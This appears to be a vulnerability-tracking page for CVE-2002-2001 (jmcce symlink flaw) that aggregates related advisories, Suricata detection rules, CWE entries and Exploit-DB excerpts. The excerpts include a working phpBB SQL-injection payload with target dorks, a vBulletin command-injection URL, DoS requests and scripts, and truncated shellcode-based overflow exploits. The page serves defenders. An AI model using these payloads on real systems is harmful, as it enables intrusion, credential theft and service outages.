CVE-2002-2001
published 2002-12-31CVE-2002-2001: jmcce 1.3.8 in Mandrake 8.1 creates log files in /tmp with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
PriorityP46low1.2CVSS 2.0
AVLACHAuNCNIPAN
EPSS
0.29%
21.3th percentile
jmcce 1.3.8 in Mandrake 8.1 creates log files in /tmp with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jmcce | jmcce | — | — |
| mandrakesoft | mandrake_linux | — | — |
CVSS provenance
nvdv2.01.2LOWAV:L/AC:H/Au:N/C:N/I:P/A:N
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x5v5-9fj9-665w: jmcce 1
ghsa_unreviewed·2022-04-30
CVE-2002-2001 [LOW] GHSA-x5v5-9fj9-665w: jmcce 1
jmcce 1.3.8 in Mandrake 8.1 creates log files in /tmp with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
Red Hat
security flaw
vendor_redhat·2002-09-30·CVSS 2.1
CVE-2002-0399 [LOW] security flaw
security flaw
Directory traversal vulnerability in GNU tar 1.13.19 through 1.13.25, and possibly later versions, allows attackers to overwrite arbitrary files during archive extraction via a (1) "/.." or (2) "./.." string, which removes the leading slash but leaves the "..", a variant of CVE-2001-1267.
Red Hat
security flaw
vendor_redhat·2002-05-10·CVSS 7.5
CVE-2002-0379 [HIGH] security flaw
security flaw
Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
Suricata
GPL FTP CWD overflow attempt
suricata·2010-09-23
CVE-1999-0219 GPL FTP CWD overflow attempt
GPL FTP CWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP CWD overflow attempt"; flow:established,to_server; content:"CWD"; nocase; isdataat:100,relative; pcre:"/^CWD\s[^\n]{100}/smi"; reference:bugtraq,11069; reference:bugtraq,1227; reference:bugtraq,1690; reference:bugtraq,6869; reference:bugtraq,7251; reference:bugtraq,7950; reference:cve,1999-0219; reference:cve,1999-1058; reference:cve,1999-1510; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0781; reference:cve,2002-0126; reference:cve,2002-0405; classtype:attempted-admin; sid:2101919; rev:25; metadata:created_at 2010_09_23, cve CVE_1999_0219, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP LIST directory traversal attempt
suricata·2010-09-23
CVE-2002-1054 GPL FTP LIST directory traversal attempt
GPL FTP LIST directory traversal attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP LIST directory traversal attempt"; flow:established,to_server; content:"LIST"; nocase; content:".."; distance:1; content:".."; distance:1; reference:cve,2002-1054; reference:bugtraq,2618; reference:nessus,11112; reference:cve,2001-0680; classtype:protocol-command-decode; sid:2101992; rev:12; metadata:created_at 2010_09_23, cve CVE_2001_0680, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_And_Directory_Discovery; target:dest_ip;)
Suricata
GPL FTP USER overflow attempt
suricata·2010-09-23
CVE-1999-1510 GPL FTP USER overflow attempt
GPL FTP USER overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP USER overflow attempt"; flow:established,to_server,no_stream; content:"USER|20|"; nocase; isdataat:100,relative; pcre:"/^USER\x20[^\x00\x20\x0a\x0d]{100}/smi"; reference:bugtraq,10078; reference:bugtraq,1227; reference:bugtraq,1504; reference:bugtraq,1690; reference:bugtraq,4638; reference:bugtraq,7307; reference:bugtraq,8376; reference:cve,1999-1510; reference:cve,1999-1514; reference:cve,1999-1519; reference:cve,1999-1539; reference:cve,2000-0479; reference:cve,2000-0656; reference:cve,2000-0761; reference:cve,2000-0943; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0256; reference:cve,2001-0794; reference:cve,2001-0826; reference:cve,2002-0126; reference:cve,2002-1522;
Exploit-DB
Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
Fully Modded phpBB - 'kb.php' SQL Injection
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
Exploit-DB
HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
exploitdb·2002-12-11
CVE-2001-0979 HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
---
/*
Program : x_hpux_11i_sw.c
Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
Complie : cc x_hpux_11i_sw.c -o x_sw;./x_sw ( not use gcc for some system)
Usage : ./x_sw [ off ]
Tested : HP-UX B11.11 & HP-UX B11.0
Author : watercloud [@] xfocus.org
Date : 2002-12-11
Note : Use as your own risk !!
*/
#include
#define T_LEN 2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
"\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
"/bin/shA";
long addr;
char buffer_env[2496];
char buffer[T_LEN];
void main(argc,argv)
int argc;
char ** argv;
{
int addr_off = 8208;
long a
Exploit-DB
Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service
exploitdb·2002-11-02
CVE-2002-1663 Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service
Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service
---
source: https://www.securityfocus.com/bid/6096/info
A denial of service vulnerability has been reported for Monkey HTTP server. The vulnerability is due to inadequate checks being performed when decoding POST requests.
An attacker can exploit this vulnerability by issuing a POST request with an invalid Content-Length header, or without a Content-Length value. When the server attempts to service the request, it will crash and lead to the denial of service condition.
POST / HTTP/1.1
Host: 127.0.0.1:2001
Content-Length: 1
Exploit-DB
vBulletin 2.0.3 - 'calendar.php' Command Execution
exploitdb·2002-09-27
CVE-2002-1660 vBulletin 2.0.3 - 'calendar.php' Command Execution
vBulletin 2.0.3 - 'calendar.php' Command Execution
---
source: https://www.securityfocus.com/bid/5820/info
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60%20%60;die();echo%22
where signifies a command to be executed on the system.
Exploit-DB
Squid 2.4.1 - Remote Buffer Overflow
exploitdb·2002-05-14
CVE-2002-0163 Squid 2.4.1 - Remote Buffer Overflow
Squid 2.4.1 - Remote Buffer Overflow
---
/* 7350squish - x86/linux squid remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
* bug found by scut 2001/09/10
* further resear
Exploit-DB
WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)
exploitdb·2002-05-10
CVE-2002-0379 WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)
WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/4713/info
Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.
This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.
/*
* http://www.freeweb.nu/mantra/05_2002/uw-imapd.html
*
* uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4
*
* Copyright (C) 2002 Christophe "korty" Bailleux
* Copyright (C) 2002 Kostya Kortchinsky
*
*
Exploit-DB
WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)
exploitdb·2002-05-10
CVE-2002-0379 WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)
WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/4713/info
Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.
This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.
/*
* 0x3a0x29wuim.c - WU-IMAP 2000.287 (linux/i86) remote exploit
*
* dekadish
*
* 0x3a0x29 crew
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
Exploit-DB
SSH (x2) - Remote Command Execution
exploitdb·2002-05-01
CVE-2001-0144 SSH (x2) - Remote Command Execution
SSH (x2) - Remote Command Execution
---
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/349.tgz (x2.tgz)
# milw0rm.com [2002-05-01]
Exploit-DB
XTux Server 2001.0 6.01 - Garbage Denial of Service
exploitdb·2002-03-09
CVE-2002-0431 XTux Server 2001.0 6.01 - Garbage Denial of Service
XTux Server 2001.0 6.01 - Garbage Denial of Service
---
source: https://www.securityfocus.com/bid/4260/info
XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources.
#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponcive and takes up lots of CPU.
use IO::Socket;
for($n=0;$nnew(PeerAddr => $ARGV[0], PeerPort =>
$ARGV[1], Proto => 'tcp' ) or print "\ncouldn't connect\n\n";
sleep 3;
print $sock "garbage data\n\n";
}
exit;
Exploit-DB
Sudo 1.6.x - Password Prompt Heap Overflow
exploitdb·2001-11-01
CVE-2002-0184 Sudo 1.6.x - Password Prompt Heap Overflow
Sudo 1.6.x - Password Prompt Heap Overflow
---
// source: https://www.securityfocus.com/bid/4593/info
Sudo is a widely used Linux/Unix utility allow users to securely run commands as other users.
Sudo is vulnerable to a heap overflow condition related to it's customizable password prompt feature. The nature of the sudo utility requires that it be installed setuid root. Successful exploitation may allow for local attackers to gain root privileges.
/*
* Created: November 1, 2001
* Updated: August 8, 2002
* Updated-2: November 4, 2002 by Eds and Dexter_Man
* ______
* / ___\ __ _ ____ ____ ____ ____ ____ __ _
* \____ \/ / \/ \/ \/ _ \ \ _ \/ / \
* / \___ \ \ \ \ \ ___/ \_/___ \___ \
* \______ / ____/__/ /__/ /___ \__/ / ____/ ____/
* \/\/ \/ \/ \/ \/ \/
*
* Hudo versus Linux/Intel Sudo
*
Exploit-DB
Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution
exploitdb·2001-07-12
CVE-2001-0538 Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution
Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/3026/info
Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system.
The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.
Scripts can execute commands without user knowledge or consent.
This assumes you have at least one message in Outlook XP's Inbox
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.App
Exploit-DB
Microsoft Outlook 98/2000/2002 - Unauthorized Email Access
exploitdb·2001-07-12
CVE-2001-0538 Microsoft Outlook 98/2000/2002 - Unauthorized Email Access
Microsoft Outlook 98/2000/2002 - Unauthorized Email Access
---
source: https://www.securityfocus.com/bid/3025/info
Microsoft Outlook introduces a vulnerability that may allow attackers to access and manipulate user email.
The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.
Scripts can access and perform operations on user email through this control without user knowledge or consent.
This assumes you have at least one message in Outlook XP's Inbox
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
Exploit-DB
ghttpd 1.4 - Daemon Buffer Overflow
exploitdb·2001-06-17
CVE-2002-1904 ghttpd 1.4 - Daemon Buffer Overflow
ghttpd 1.4 - Daemon Buffer Overflow
---
// source: https://www.securityfocus.com/bid/2879/info
ghttpd is a freely available, open source web server for Unix systems. ghttpd supports CGI and is easy to configure and use.
A buffer overflow is known to exist in ghttp which will allow arbitrary code to be executed with the privileges of the webserver.
Proof-of-concept code has demonstrated that this vulnerability can be exploited by remote attackers.
/*
* GazTek HTTP Daemon v1.4 (ghttpd) Linux x86 remote exploit
* by qitest1 - 17/06/2001
*
* Root privileges are dropped out by the daemon, so a shell owned by
* nobody will be executed.
*
* 0x69.. =)
*/
#include
#include
#include
#include
#include
#define RETPOS 161
struct targ
{
int def;
char *descr;
unsigned long int retaddr;
};
struc
Exploit-DB
Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)
exploitdb·2001-04-09
CVE-2001-0594 Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)
Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/2558/info
The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.
An exploit for x86 Solaris is available to attackers.
/* kcms_configure -o -S command line buffer overflow, SPARC/solaris 8
*
* https://www.securityfocus.com/bid/2558
*
* Coded June 22, 2002 by Adam Slattery. Phear. The vulnerability
* was discovered a long time ago (04/2001), but there haven't been
*
Bugzilla
CVE-2002-0379 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-0379 [HIGH] CVE-2002-0379 security flaw
CVE-2002-0379 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
Bugzilla
CVE-2002-0399 security flaw
bugzilla·2018-08-16·CVSS 2.1
CVE-2002-0399 [LOW] CVE-2002-0399 security flaw
CVE-2002-0399 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Directory traversal vulnerability in GNU tar 1.13.19 through 1.13.25, and possibly later versions, allows attackers to overwrite arbitrary files during archive extraction via a (1) "/.." or (2) "./.." string, which removes the leading slash but leaves the "..", a variant of CVE-2001-1267.
Bugzilla
tcpdump problem with bgp decoding
bugzilla·2003-01-29
[MEDIUM] tcpdump problem with bgp decoding
tcpdump problem with bgp decoding
The BGP decoding routines for tcpdump used incorrect bounds checking when
copying data. This could be abused by introducing malicious traffic on a sniffed
network for a denial of service attack against tcpdump, or possibly even remote
code execution.
RHSA-2002:094 patched CAN-2002-0380 with tcpdump-3.6.2-11
AS/RHSA-2002:121 patched CAN-2002-0380 with tcpdump-3.6.2-11
See http://marc.theaimsgroup.com/?l=bugtraq&m=103956164004031&w=2
also http://www.tcpdump.org/lists/workers/2001/10/msg00101.html
3.6.* is vulnerable, 3.7 isn't
CVE applied for Dec11: CAN-2002-1350
Discussion:
*** Bug 80152 has been marked as a duplicate of this bug. ***
---
An errata has been issued which should help the problem described in this bug report.
This report is therefore
CWE
Improper Handling of Undefined Parameters
mitre_cwe·CVSS 5.0
CVE-2002-1488 [MEDIUM] CWE-236 Improper Handling of Undefined Parameters
CWE-236: Improper Handling of Undefined Parameters
The product does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Unexpected State.
Observed Examples:
CVE-2002-1488: Crash in IRC client via PART message from a channel the user is not in.
CVE-2001-0650: Router crash or bad route modification using BGP updates with invalid transitive attribute.
CWE
Path Equivalence: 'filename/' (Trailing Slash)
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-49 Path Equivalence: 'filename/' (Trailing Slash)
CWE-49: Path Equivalence: 'filename/' (Trailing Slash)
The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Files or Directories, Modify Files or Directories.
Observed Examples:
CVE-2002-0253: Overlaps infoleak
CVE-2001-0446: Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.
CVE-2004-0334: Bypass Basic Authentication for files using trailing "/"
CVE-2001-0893: Read sensitive files with trailing "/
CWE
Improper Preservation of Permissions
mitre_cwe·CVSS 7.8
[HIGH] CWE-281 Improper Preservation of Permissions
CWE-281: Improper Preservation of Permissions
The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Application Data, Modify Application Data.
Observed Examples:
CVE-2002-2323: Incorrect ACLs used when restoring backups from directories that use symbolic links.
CVE-2001-1515: Automatic modification of permissions inherited from another file system.
CVE-2005-1920: Permissions on backup file are created with defaults,
CWE
Authentication Bypass by Primary Weakness
mitre_cwe·CVSS 6.4
CVE-2002-1374 [MEDIUM] CWE-305 Authentication Bypass by Primary Weakness
CWE-305: Authentication Bypass by Primary Weakness
The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism.
Observed Examples:
CVE-2002-1374: The provided password is only compared against the first character of the real password.
CVE-2000-0979: The password is not properly checked, which allows remote attackers to bypass access controls by sending a 1-byte password that matches the first character of the real password.
CVE-2001-0088: Chain: Forum softwa
CWE
The UI Performs the Wrong Action
mitre_cwe·CVSS 5.0
CVE-2001-1387 [MEDIUM] CWE-449 The UI Performs the Wrong Action
CWE-449: The UI Performs the Wrong Action
The UI performs the wrong action with respect to the user's request.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Other. Impact: Quality Degradation, Varies by Context.
Detection Methods:
Manual Analysis: Perform extensive functionality testing of the UI. The UI should behave as specified.
Observed Examples:
CVE-2001-1387: Network firewall accidentally implements one command line option as if it were another, possibly leading to behavioral infoleak.
CVE-2001-0081: Command line option correctly suppresses a user prompt but does not properly disable a feature, although when the product prompts the user, the feature is properly disabled.
CVE-2002-1977: Product does not "time out" according to user specification, leavin
http://www.iss.net/security_center/static/7980.phphttp://www.mandriva.com/security/advisories?name=MDKSA-2002:008http://www.securityfocus.com/bid/3940http://www.iss.net/security_center/static/7980.phphttp://www.mandriva.com/security/advisories?name=MDKSA-2002:008http://www.securityfocus.com/bid/3940
2002-12-31
Published